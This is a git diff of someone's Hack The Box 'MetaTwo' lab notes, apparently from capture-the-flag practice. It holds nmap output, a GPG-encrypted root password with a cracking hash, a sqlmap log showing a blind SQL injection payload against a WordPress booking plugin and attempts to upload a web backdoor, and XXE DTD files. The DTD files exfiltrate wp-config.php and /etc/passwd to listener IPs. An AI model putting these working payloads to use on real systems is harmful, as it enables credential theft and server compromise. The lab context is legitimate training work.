+<taskend task="Connect Scan" time="1674662961" extrainfo="1000 total ports"/>
+<taskbegin task="Service scan" time="1674662961"/>
+<taskend task="Service scan" time="1674663480" extrainfo="3 services on 1 host"/>
+<taskbegin task="NSE" time="1674663480"/>
+<taskend task="NSE" time="1674663490"/>
+<taskbegin task="NSE" time="1674663490"/>
+<taskend task="NSE" time="1674663519"/>
+<taskbegin task="NSE" time="1674663519"/>
+<taskend task="NSE" time="1674663519"/>
+<host starttime="1674662960" endtime="1674663519"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.11.186" addrtype="ipv4"/>
+<hostnames>
+<hostname name="metatwo.htb" type="PTR"/>
+</hostnames>
+<ports><extraports state="closed" count="997">
+<extrareasons reason="conn-refused" count="997" proto="tcp" ports="1,3-4,6-7,9,13,17,19-20,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
+</extraports>
+<port protocol="tcp" portid="21"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ftp" servicefp="SF-Port21-TCP:V=7.93%I=9%D=1/25%Time=63D1543C%P=x86_64-pc-linux-gnu%r(GenericLines,8F,&quot;220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n&quot;)%r(Verifier,33,&quot;220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10\.11\.186\]\r\n&quot;);" method="probed" conf="10"/><script id="fingerprint-strings" output="&#xa;  GenericLines: &#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]&#xa;    Invalid command: try being more creative&#xa;    Invalid command: try being more creative&#xa;  Verifier: &#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]"><elem key="GenericLines">&#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]&#xa;    Invalid command: try being more creative&#xa;    Invalid command: try being more creative</elem>
+<elem key="Verifier">&#xa;    220 ProFTPD Server (Debian) [::ffff:10.10.11.186]</elem>
+</script></port>
+<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.4p1 Debian 5+deb11u1" extrainfo="protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.4p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa;  3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=&#xa;  256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=&#xa;  256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2"><table>
+<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDPp9LmBKMOuXu2ZOpw8JorL5ah0sU0kIBXvJB8LX26rpbOhw+1MPdhx6ptZzXwQ8wkQc88xu5h+oB8NGkeHLYhvRqtZmvkTpOsyJiMm+0Udbg+IJCENPiKGSC5J+0tt4QPj92xtTe/f7WV4hbBLDQust46D1xVJVOCNfaloIC40BtWoMWIoEFWnk7U3kwXcM5336LuUnhm69XApDB4y/dt5CgXFoWlDQi45WLLQGbanCNAlT9XwyPnpIyqQdF7mRJ5yRXUOXGeGmoO9+JALVQIEJ/7Ljxts6QuV633wFefpxnmvTu7XX9W8vxUcmInIEIQCmunR5YH4ZgWRclT+6rzwRQw1DH1z/ZYui5Bjn82neoJunhweTJXQcotBp8glpvq3X/rQgZASSyYrOJghBlNVZDqPzp4vBC78gn6TyZyuJXhDxw+lHxF82IMT2fatp240InLVvoWrTWlXlEyPiHraKC0okOVtul6T0VRxsuT+QsyU7pdNFkn2wDVvC25AW8=</elem>
+<elem key="bits">3072</elem>
+<elem key="type">ssh-rsa</elem>
+<elem key="fingerprint">c4b44617d2102d8fec1dc927fecd79ee</elem>
+</table>
+<table>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB1ZmNogWBUF8MwkNsezebQ+0/yPq7RX3/j9s4Qh8jbGlmvAcN0Z/aIBrzbEuTRf3/cHehtaNf9qrF2ehQAeM94=</elem>
+<elem key="bits">256</elem>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+<elem key="fingerprint">2aea2fcb23e8c529409cab866dcd4411</elem>
+</table>
+<table>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIOP4kxBr9kumAjfplon8fXJpuqhdMJy2rpd3FM7+mGw2</elem>
+<elem key="bits">256</elem>
+<elem key="type">ssh-ed25519</elem>
+<elem key="fingerprint">fd78c0b0e22016fa050debd83f12a4ab</elem>
+</table>
+</script></port>
+<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="nginx" version="1.18.0" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.18.0</cpe></service><script id="http-title" output="Did not follow redirect to http://metapress.htb/"><elem key="redirect_url">http://metapress.htb/</elem>
+</script><script id="http-server-header" output="nginx/1.18.0"><elem>nginx/1.18.0</elem>
+</script><script id="http-methods" output="&#xa;  Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
+<elem>GET</elem>
+<elem>HEAD</elem>
+<elem>POST</elem>
+<elem>OPTIONS</elem>
+</table>
+</script></port>
+</ports>
+<times srtt="26037" rttvar="1478" to="100000"/>
+</host>
+<taskbegin task="NSE" time="1674663519"/>
+<taskend task="NSE" time="1674663519"/>
+<taskbegin task="NSE" time="1674663519"/>
+<taskend task="NSE" time="1674663519"/>
+<taskbegin task="NSE" time="1674663519"/>
+<taskend task="NSE" time="1674663519"/>
+<runstats><finished time="1674663519" timestr="Wed Jan 25 11:18:39 2023" summary="Nmap done at Wed Jan 25 11:18:39 2023; 1 IP address (1 host up) scanned in 559.05 seconds" elapsed="559.05" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
--- a/HTB/metatwo/root.hash
+++ b/HTB/metatwo/root.hash
@@ -0,0 +1 @@
+root:$gpg$*0*74*ffc3c73d444c36e1aa99e2b099ba12ef12c898d215c912f057cd13d0743e2de8115e7d63367c7a5c88ce651a34f248aacd5d8d6861a5a4e94daf74ab96917445ab5bc50196064b39177a*0*18*0*0*0*0000000000000000
--- a/HTB/metatwo/root.pass
+++ b/HTB/metatwo/root.pass
@@ -0,0 +1,12 @@
+-----BEGIN PGP MESSAGE-----
+
+hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2
+nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km
+yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED
+/2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf
+iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg
+krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw
+mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr
+lpF0RatbxQGWBks5F3o=
+=uh1B
+-----END PGP MESSAGE-----
--- a/HTB/metatwo/search.req
+++ b/HTB/metatwo/search.req
@@ -0,0 +1,11 @@
+GET /?s=search HTTP/1.1
+Host: metapress.htb
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://metapress.htb/category/
+Cookie: PHPSESSID=rcu9pjs0rv3cdgngvjlqbi0le6
+Upgrade-Insecure-Requests: 1
+
--- a/HTB/metatwo/sqlmap.txt
+++ b/HTB/metatwo/sqlmap.txt
@@ -0,0 +1,91 @@
+        ___
+       __H__
+ ___ ___[)]_____ ___ ___  {1.7#stable}
+|_ -| . ["]     | .'| . |
+|___|_  [)]_|_|_|__,|  _|
+      |_|V...       |_|   https://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting @ 02:08:42 /2023-01-26/
+
+[02:08:42] [INFO] parsing HTTP request from 'appointment.req'
+[02:08:42] [WARNING] you did not provide the local path where Metasploit Framework is installed
+[02:08:42] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s)
+[02:08:42] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path
+[02:08:42] [WARNING] provided value for parameter 'appointment_data[selected_cat_name]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
+[02:08:42] [WARNING] provided value for parameter 'appointment_data[customer_name]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
+[02:08:42] [WARNING] provided value for parameter 'appointment_data[selected_payment_method]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
+[02:08:42] [WARNING] provided value for parameter 'appointment_data[total_services]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
+[02:08:42] [INFO] resuming back-end DBMS 'mysql' 
+[02:08:42] [INFO] testing connection to the target URL
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: appointment_data[selected_service] (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause
+    Payload: action=bookingpress_front_save_appointment_booking&appointment_data[selected_category]=1&appointment_data[selected_cat_name]=&appointment_data[selected_service]=-1434 OR 8507=8507&appointment_data[selected_service_name]=Startup meeting&appointment_data[selected_service_price]=$0.00&appointment_data[service_price_without_currency]=0&appointment_data[selected_date]=2023-01-27&appointment_data[selected_start_time]=12:00&appointment_data[selected_end_time]=12:30&appointment_data[customer_name]=&appointment_data[customer_firstname]=fname&appointment_data[customer_lastname]=lname&appointment_data[customer_phone]=12345678&appointment_data[customer_email]=email@example.com&appointment_data[appointment_note]=note&appointment_data[selected_payment_method]=&appointment_data[customer_phone_country]=BB&appointment_data[total_services]=&appointment_data[stime]=1674677898&appointment_data[spam_captcha]=xrv6WZBaomY7&_wpnonce=8db3188c79
+---
+[02:08:42] [INFO] the back-end DBMS is MySQL
+web application technology: Nginx 1.18.0, PHP 8.0.24
+back-end DBMS: MySQL 5 (MariaDB fork)
+[02:08:42] [INFO] fingerprinting the back-end DBMS operating system
+[02:08:42] [INFO] the back-end DBMS operating system is Linux
+[02:08:42] [INFO] going to use a web backdoor to establish the tunnel
+which web application language does the web server support?
+[1] ASP
+[2] ASPX
+[3] JSP
+[4] PHP (default)
+> 4
+do you want sqlmap to further try to provoke the full path disclosure? [Y/n] Y
+[02:08:43] [WARNING] unable to automatically retrieve the web server document root
+what do you want to use for writable directory?
+[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
+[2] custom location(s)
+[3] custom directory list file
+[4] brute force search
+> 1
+[02:08:43] [WARNING] unable to automatically parse any web server path
+[02:08:43] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:43] [WARNING] unable to upload the file stager on '/var/www/'
+[02:08:43] [INFO] trying to upload the file stager on '/var/www/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:44] [WARNING] unable to upload the file stager on '/var/www/wp-admin/'
+[02:08:44] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:45] [WARNING] unable to upload the file stager on '/var/www/html/'
+[02:08:45] [INFO] trying to upload the file stager on '/var/www/html/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:45] [WARNING] unable to upload the file stager on '/var/www/html/wp-admin/'
+[02:08:45] [INFO] trying to upload the file stager on '/var/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:46] [WARNING] unable to upload the file stager on '/var/www/htdocs/'
+[02:08:46] [INFO] trying to upload the file stager on '/var/www/htdocs/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:47] [WARNING] unable to upload the file stager on '/var/www/htdocs/wp-admin/'
+[02:08:47] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:47] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
+[02:08:47] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:48] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/wp-admin/'
+[02:08:48] [INFO] trying to upload the file stager on '/usr/local/www/data/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:49] [WARNING] unable to upload the file stager on '/usr/local/www/data/'
+[02:08:49] [INFO] trying to upload the file stager on '/usr/local/www/data/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:50] [WARNING] unable to upload the file stager on '/usr/local/www/data/wp-admin/'
+[02:08:50] [INFO] trying to upload the file stager on '/var/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:50] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/'
+[02:08:50] [INFO] trying to upload the file stager on '/var/apache2/htdocs/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:51] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/wp-admin/'
+[02:08:51] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:52] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
+[02:08:52] [INFO] trying to upload the file stager on '/var/www/nginx-default/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:52] [WARNING] unable to upload the file stager on '/var/www/nginx-default/wp-admin/'
+[02:08:52] [INFO] trying to upload the file stager on '/srv/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:53] [WARNING] unable to upload the file stager on '/srv/www/htdocs/'
+[02:08:53] [INFO] trying to upload the file stager on '/srv/www/htdocs/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:54] [WARNING] unable to upload the file stager on '/srv/www/htdocs/wp-admin/'
+[02:08:54] [INFO] trying to upload the file stager on '/usr/local/var/www/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:54] [WARNING] unable to upload the file stager on '/usr/local/var/www/'
+[02:08:54] [INFO] trying to upload the file stager on '/usr/local/var/www/wp-admin/' via LIMIT 'LINES TERMINATED BY' method
+[02:08:55] [WARNING] unable to upload the file stager on '/usr/local/var/www/wp-admin/'
+[02:08:55] [CRITICAL] unable to prompt for an out-of-band session
+[02:08:55] [WARNING] HTTP error codes detected during run:
+500 (Internal Server Error) - 20 times, 404 (Not Found) - 86 times, 400 (Bad Request) - 1 times
+
+[*] ending @ 02:08:55 /2023-01-26/
+
--- a/HTB/metatwo/users
+++ b/HTB/metatwo/users
@@ -0,0 +1 @@
+manager
--- a/HTB/metatwo/xxe.dtd
+++ b/HTB/metatwo/xxe.dtd
@@ -0,0 +1,2 @@
+<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=../wp-config.php">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.16.5:8000/?%data;'>">
--- a/HTB/metatwo/xxe.wav
+++ b/HTB/metatwo/xxe.wav
--- a/HTB/metatwo/xxe/xxe.dtd
+++ b/HTB/metatwo/xxe/xxe.dtd
@@ -0,0 +1,2 @@
+<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://172.16.238.1:8080/?%data;'>">
--- a/HTB/metatwo/xxe/xxe.wav
+++ b/HTB/metatwo/xxe/xxe.wav
				`@@ -0,0 +1 @@`
				`Passpie:$gpg$17543072e975911867862609115f302a3d0196aec0c2ebf79a84c0303056df921c965e589f82d7dd71099ed9749408d5ad17a4421006d89b49c03254271621d36a3443b38bad35df0f0e2c77f6b965011712907cb55ccb37aaad:::Passpie (Auto-generated by Passpie) <passpie@local>::keys2.txt`
				`@@ -0,0 +1 @@`
				`root:$gpg$074ffc3c73d444c36e1aa99e2b099ba12ef12c898d215c912f057cd13d0743e2de8115e7d63367c7a5c88ce651a34f248aacd5d8d6861a5a4e94daf74ab96917445ab5bc50196064b39177a018000*0000000000000000`